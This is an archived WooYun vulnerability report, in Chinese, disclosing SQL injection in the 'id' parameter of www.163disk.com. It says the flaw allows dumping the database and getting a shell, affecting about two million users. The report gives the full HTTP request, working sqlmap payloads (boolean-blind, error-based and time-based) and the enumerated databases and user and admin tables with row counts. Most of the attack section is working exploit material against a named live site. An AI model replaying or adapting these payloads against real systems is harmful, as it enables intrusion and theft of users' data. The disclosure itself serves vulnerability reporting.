乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
rt
参数id 报错注入,可被脱裤,dz的站getshell,影响200w用户信息
POST /?ac=file_ajax&ct=count_form HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://www.163disk.comReferer: http://www.163disk.com/fileview_1742151.htmlX-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: www.163disk.comContent-Length: 18Accept-Encoding: gzip, deflateid=1742151&count=0sqlmap identified the following injection point(s) with a total of 145 HTTP(s) requests:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1742151 AND 9589=9589&count=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1742151 AND (SELECT 7468 FROM(SELECT COUNT(*),CONCAT(0x716b716a71,(SELECT (ELT(7468=7468,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&count=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1742151 AND (SELECT * FROM (SELECT(SLEEP(5)))QeZS)&count=0---available databases [4]:[*] 163diskcom[*] information_schema[*] mysql[*] performance_schemaDatabase: 163diskcom+----------------------+---------+| Table | Entries |+----------------------+---------+| disk_user_filecount | 2096739 || disk_user_filebody | 2096678 || disk_user_file | 2096642 || disk_user_disk | 531309 || disk_user_info | 531278 || disk_user_login | 165110 || disk_user_folder | 74519 || disk_user_msg | 74364 || disk_user_feedback | 16865 || disk_all_adminlog | 2943 || disk_all_badword | 1246 || disk_all_album | 142 || `disk_all_album.bak` | 141 || disk_all_links | 95 || disk_all_notice | 14 || disk_all_server | 13 || disk_all_hotso | 8 || disk_all_list | 8 || disk_all_smtp | 6 || disk_all_admin | 3 || disk_all_config | 1 |+----------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-11-28 12:16
漏洞Rank:4 (WooYun评价)
暂无